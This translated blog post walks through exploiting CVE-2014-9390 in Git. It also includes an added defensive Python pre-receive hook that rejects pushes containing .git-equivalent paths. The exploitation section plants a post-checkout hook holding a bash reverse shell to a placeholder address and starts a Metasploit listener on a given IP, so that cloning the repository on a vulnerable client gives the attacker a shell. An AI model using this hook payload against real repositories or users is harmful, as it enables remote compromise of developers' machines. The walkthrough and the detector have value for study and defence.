Kiss Snatchers · 2014/12/22 12:59
from:https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
0x00 Background
CVE-2014-9390 has drawn a lot of attention recently: a single git command can get you hacked. I will not go into the details of the vulnerability here; the announcement at article.gmane.org/gmane.linux… covers them. In short, Git did not reject tree entries whose names are equivalent to `.git` on a case-insensitive filesystem (such as `.GiT`), so a malicious repository could write into the victim's `.git` directory, including `.git/hooks`, at clone time. If you use Git on a case-insensitive filesystem, which is the default on Windows and OS X, update your client (the fixed releases are 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1).
Let's look at this vulnerability from a penetration tester's point of view.
0x01 Preparation
I created a new project named cve-2014-9390.
Inside it, create a directory named `.GiT` (uppercase G, lowercase i, uppercase T), add a file `vulnerable.txt` to it, and push it to the project:
```bash
~/cve-2014-9390# mkdir .GiT
~/cve-2014-9390# cd .GiT/
~/cve-2014-9390/.GiT# echo "Vulnerable" >> vulnerable.txt
~/cve-2014-9390/.GiT# cd ..
~/cve-2014-9390# git add .
~/cve-2014-9390# git commit -m 'poc'
[master bec157d] poc
 1 file changed, 1 insertion(+)
 create mode 100644 .GiT/vulnerable.txt
~/cve-2014-9390# git push
```
Now let's clone the same project from a Windows machine with a vulnerable Git client:
```bash
$ git clone git@gitlab.com:mehmet/cve-2014-9390.git
Cloning into 'cve-2014-9390'...
Enter passphrase for key '/c/Users/rootlab/.ssh/id_rsa':
remote: Counting objects: 7, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 7 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (7/7), done.
Checking connectivity... done.
```
Because NTFS is case-insensitive, the `.GiT` directory from the repository is checked out into the clone's real `.git` directory: `vulnerable.txt` now sits inside `.git`.
0x02 Exploitation
What are Git hooks?
Like many other version control systems, Git can run custom scripts when important actions occur. Hooks come in two kinds, client-side and server-side. Client-side hooks run on the user's machine during operations such as commit, merge and checkout, so they fire on git pull and git checkout, and also at the end of git clone, which performs a checkout.
How are Git hooks implemented?
Each hook is simply a script with a fixed name in the `.git/hooks` directory; if it is present and executable, Git runs it at the corresponding event. Since this vulnerability lets a repository write into the victim's `.git` directory, it also lets us drop a hook script into `.git/hooks`.
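The two things above, the `.git`-equivalent name check and a hook, fit together in one defensive script. The following Python is an added example, not code from the original post or from Mehmet Ince: it re-implements the path check Git introduced for CVE-2014-9390 (following the shape of Git's `is_ntfs_dotgit` and `is_hfs_dotgit`) and wraps it as a server-side pre-receive hook, so a push that would write into a vulnerable client's `.git` is rejected before any clone can happen. `HFS_IGNORED` is an assumed subset of the code points HFS+ ignores, not Git's full table; the `--scan` switch and the `SAMPLE_TREE` listing are constructed for this example.

```python
"""Added example (not from the original post): re-implementation of the path
check Git introduced for CVE-2014-9390, plus a pre-receive hook built on it.

The two predicates follow Git's is_ntfs_dotgit / is_hfs_dotgit; HFS_IGNORED
is an assumed subset of the code points HFS+ ignores, not Git's full table.
"""
import subprocess
import sys

# Assumption: code points HFS+ drops when comparing names (zero-width joiners,
# bidi marks/overrides, BOM). Git's own table is what to trust in production.
HFS_IGNORED = {
    0x200C, 0x200D, 0x200E, 0x200F,
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,
    0x206A, 0x206B, 0x206C, 0x206D, 0x206E, 0x206F,
    0xFEFF,
}


def is_ntfs_dotgit(component: str) -> bool:
    """True if NTFS would open this path component as '.git'.

    NTFS compares case-insensitively, silently strips trailing dots and
    spaces, and also knows '.git' under its 8.3 short name 'GIT~1'.
    """
    low = component.lower()
    for prefix in (".git", "git~1"):
        if low.startswith(prefix) and low[len(prefix):].strip(". ") == "":
            return True
    return False


def is_hfs_dotgit(component: str) -> bool:
    """True if HFS+ would treat this component as '.git': the filesystem
    ignores the code points in HFS_IGNORED and is case-insensitive."""
    kept = "".join(ch for ch in component if ord(ch) not in HFS_IGNORED)
    return kept.lower() == ".git"


def is_dotgit_like(component: str) -> bool:
    return is_ntfs_dotgit(component) or is_hfs_dotgit(component)


def find_dotgit_paths(paths):
    """Return the tree paths (as printed by `git ls-tree -r --name-only`)
    that contain a component a vulnerable client would check out into .git."""
    return [p for p in paths if any(is_dotgit_like(c) for c in p.split("/"))]


def pre_receive(update_lines, ls_tree):
    """Server-side decision for a push.

    update_lines: the "<old-sha> <new-sha> <refname>" lines a pre-receive
    hook reads on stdin.  ls_tree(rev): returns the paths in that revision,
    injected so the logic can run without a repository.  Returns the list of
    (refname, path) pairs that should cause the push to be rejected.
    """
    offending = []
    for line in update_lines:
        old, new, ref = line.split()
        if set(new) == {"0"}:          # ref deletion: no tree to inspect
            continue
        for path in find_dotgit_paths(ls_tree(new)):
            offending.append((ref, path))
    return offending


def git_ls_tree(rev):
    """Real ls_tree backend: list every path in `rev`, NUL-separated so that
    names containing newlines or odd Unicode survive."""
    out = subprocess.check_output(
        ["git", "ls-tree", "-r", "--name-only", "-z", rev])
    return [p.decode("utf-8", "surrogateescape") for p in out.split(b"\0") if p]


# Constructed sample listing, shaped like the repository built in this post.
SAMPLE_TREE = [
    "README.md",
    ".gitignore",            # benign: remainder 'ignore' is not dots/spaces
    "src/git.c",             # benign
    ".GiT/vulnerable.txt",   # the case variant used in this post
    ".GiT/hooks/post-checkout",
    "docs/.git./notes",      # NTFS strips the trailing dot
    "GIT~1/config",          # NTFS 8.3 short name of .git
    ".g\u200cit/config",     # zero-width non-joiner, ignored by HFS+
]


if __name__ == "__main__":
    # Install as hooks/pre-receive on the server; with no arguments it reads
    # the ref updates from stdin, with --scan it just checks SAMPLE_TREE.
    if "--scan" in sys.argv:
        bad = [("(sample)", p) for p in find_dotgit_paths(SAMPLE_TREE)]
    else:
        bad = pre_receive(sys.stdin.read().splitlines(), git_ls_tree)
    for ref, path in bad:
        print(f"rejected {ref}: {path!r} would be checked out as .git",
              file=sys.stderr)
    sys.exit(1 if bad else 0)
```

The check is deliberately per path component, because the dangerous name can sit anywhere in the tree (`docs/.git./notes` is just as bad as a top-level `.GiT`), and the hook inspects the full tree of the new revision rather than only the diff, so a rewrite that sneaks the entry into an earlier commit is still caught. On a server you cannot patch, this hook blocks the attack for every client; on the client side the same `find_dotgit_paths` can be run over `git ls-tree -r --name-only` output from a bare mirror before checking out with an old Git.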
Let's create a `hooks` subdirectory in the fake `.GiT` directory and put a `post-checkout` script in it:
```bash
~/cve-2014-9390# mkdir .GiT/hooks
~/cve-2014-9390# echo '#!/bin/sh' > .GiT/hooks/post-checkout
~/cve-2014-9390# echo 'bash -i >& /dev/tcp/[IPADDRESS]/443 0>&1' >> .GiT/hooks/post-checkout
~/cve-2014-9390# git add .
~/cve-2014-9390# git commit -m 'add reverse connection payload'
[master 389c979] add powershell payload
 1 file changed, 4 insertions(+)
 create mode 100644 .GiT/hooks/post-checkout
~/cve-2014-9390# git push
```
Note that the hook was committed with mode 100644. Git for Windows does not depend on the executable bit, but a Linux or OS X victim would only run the hook if it were committed as executable (`git update-index --chmod=+x .GiT/hooks/post-checkout` before committing), and `/dev/tcp` redirection is a bash feature, so the script also relies on bash being present on the victim. Meanwhile, on the attacker's machine we start a listener on port 443:
```bash
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 108.61.164.142
msf exploit(handler) > exploit
[*] Started reverse handler on 108.61.164.142:443
[*] Starting the payload handler...
```
Now we clone https://gitlab.com/mehmet/cve-2014-9390 again from the vulnerable Windows client.
It all seems normal, but…